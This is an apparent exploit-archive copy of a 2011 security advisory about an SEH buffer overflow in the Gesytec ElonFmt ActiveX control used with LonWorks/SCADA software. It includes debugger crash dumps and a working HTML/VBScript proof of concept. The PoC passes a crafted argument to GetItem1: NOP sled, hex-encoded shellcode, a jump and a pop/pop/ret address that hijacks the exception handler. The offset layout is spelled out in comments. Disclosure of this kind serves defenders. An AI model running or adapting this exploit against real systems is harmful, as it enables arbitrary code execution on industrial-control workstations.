扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 |
<!-- Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH) Vendor: Gesytec GmbH Product web page: http://www.gesytec.de Affected version: 1.1.14.1 Summary: Connects LonWorks networks to process control, visualization, SCADA and office software. Desc: The ElonFmt ActiveX Control Module suffers from a buffer overflow vulnerability. When a large buffer is sent to the pid item of the GetItem1 function in elonfmt.ocx module, we get a few memory registers overwritten including the SEH. We're dealing with a character translation. An attacker can gain access to the system on the affected node and execute arbitrary code. ---------------------------------------------------------------------------------- (fc.1608): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=cccccccc edx=7c9032bc esi=00000000 edi=00000000 eip=cccccccc esp=0013e7d8 ebp=0013e7f8 iopl=0 nv up ei pl zr na pe nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010246 cccccccc ????? 0:000> !exchain 0013e7ec: ntdll!ExecuteHandler2+3a (7c9032bc) 0013ecf0: cccccccc Invalid exception stack at bbbbbbbb 0:000> u 0013ecf0 0013ecf0 bbbbbbbbccmov ebx,0CCBBBBBBh 0013ecf5 ccint 3 0013ecf6 ccint 3 0013ecf7 ccint 3 0013ecf8 ddddfstpst(5) 0013ecfa ddddfstpst(5) 0013ecfc ddddfstpst(5) 0013ecfe ddddfstpst(5) ... ... ... 0:000> d esp 0013eb5801 00 00 00 8d 61 53 80-7c 5a 63 af 00 00 00 00.....aS.|Zc..... 0013eb6888 d5 2e ba 00 00 00 00-24 46 53 8a 00 86 8f bf........$FS..... 0013eb78a8 5a 63 af a8 5a 63 af-fb 0a 80 bf 60 29 53 89.Zc..Zc.....`)S. 0013eb88ce 86 8f bf 68 d5 2e ba-88 d5 2e ba 00 00 00 00....h........... 0013eb9806 00 05 00 a1 00 00 00-2e 0e 73 74 d1 18 43 7e..........st..C~ 0013eba801 00 00 00 00 00 00 00-40 f7 47 00 81 18 c3 77........@.G....w 0013ebb81a 03 00 00 a2 56 00 10-00 ed 13 00 e8 eb 13 00.....V.......... 0013ebc820 8f 63 01 b8 8e 63 01-81 18 c3 77 01 00 00 00 .c...c....w.... 0:000> d 0013ebd864 21 12 77 ff 00 00 00-74 e1 97 7c 51 7c 91 7cd!.w....t..|Q|.| 0013ebe8aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa................ 0013ebf8aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa................ 0013ec08aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa................ 0013ec18aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa................ 0013ec28aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa................ 0013ec38aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa................ 0013ec48aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa................ ... ... ... 0:000> d 0013ece8aa aa aa aa aa aa aa aa-bb bb bb bb cc cc cc cc................ 0013ecf8dd dd dd dd dd dd dd dd-dd ad d0 01 01 00 63 01..............c. 0013ed0800 00 00 00 b8 8e 63 01-01 00 00 00 00 ed 13 00......c......... 0013ed1882 a5 00 10 8c ed 13 00-b8 8e 63 01 28 ee 13 00..........c.(... 0013ed2800 00 00 00 80 02 63 01-80 ed 13 00 ae 43 dd 73......c......C.s 0013ed385c ed 13 00 d8 f0 00 10-02 00 00 00 d9 a3 00 10\............... 0013ed4880 02 63 01 24 8e 56 01-01 00 00 00 78 8e 63 01..c.$.V.....x.c. 0013ed5848 ed 13 00 80 ed 13 00-98 f0 00 10 01 00 00 00H............... ---------------------------------------------------------------------------------- Tested on: Microsoft Windows XP Professional SP3 (EN) Easylon OPC Server M 2.30.66.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com Zero Science Lab - http://www.zeroscience.mk High five to sickn3ss! Advisory ID: ZSL-2011-5011 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5011.php 09.04.2011 JUST A PoC MODEL: --> <html> <object classid='clsid:824C4DC5-8DA4-11D6-A01F-00E098177CDC' id='zsl' /> <script language='VBScript'> targetFile = "C:\Easylon\Shared\ElonFmt.ocx" prototype= "Function GetItem1 ( ByVal typeName As String ,ByVal pid As String ,ByVal selector As Integer ) As Object" memberName = "GetItem1" progid = "ELONFMTLib.ElonFmt" argCount = 3 arg1="defaultV" arg2 = String(10, "90") _ + "2bc9b88bc18865b132ddc3d97424f45d31450e03" _ + "450e834ec56a90ac2ee35b4caf94d2a99e8681ba" _ + "b316c1ee3fdc871acb900f2d7c1e76007daeb6ce" _ + "bdb04a0c921272dfe753b33d07016c4abab6190e" _ + "07b6cd0537c068d9cc7a72097cf03cb1f65e9dc0" _ + "dbbce18b5076910ab1465a3dfd0565f2f054a134" _ + "eb22d94796341a3a4cb0bf9c0762641dcbf5ef11" _ + "a072b7353756c341bc5904c0867d80895d1f9177" _ + "3320c1dfec8489cdf9bfd39bfc326ee2ff4c7144" _ + "687cfa0bef8129681fc870d88895e059d525df9d" _ + "e0a5ea5d17b59e5853717210cc147487ed3c1746" _ + "7edcd8" _ + String(62, "A") + "eb069090" + "78c70110" _ + "e9e0fdffff" + String(20, "D") arg3=1 zsl.GetItem1 arg1 ,arg2 ,arg3 ' 'Argument No.2 Structure: '-------------------------------------------------------------------------------------------------------------- ' ' (20)NOPSLED + (446)SCODE(calc) + (62)JUNK + (8)JMP + (8)P/P/R EDI LDRF32R.dll + (10)JMP BCk + (20)JUNK ' '-------------------------------------------------------------------------------------------------------------- ' ' ' 'Scenes (2/5) '-------------------------------------------------------------------------------------------------------------- ' 'arg2 = String(528, "A") + "BBBBBBBB" + "CCCCCCCC" + "DDDDDDDD" + "41414141" ' ' junk nsehseh(eip)pad eip ' '-------------------------------------------------------------------------------------------------------------- ' 'arg2 = String(528, "A") + "BBBBBBBB" + "CCCCCCCC" + String(101, "D") ' ' junk nsehseh(eip) random ' '-------------------------------------------------------------------------------------------------------------- ' </script> </html> |
体验盒子
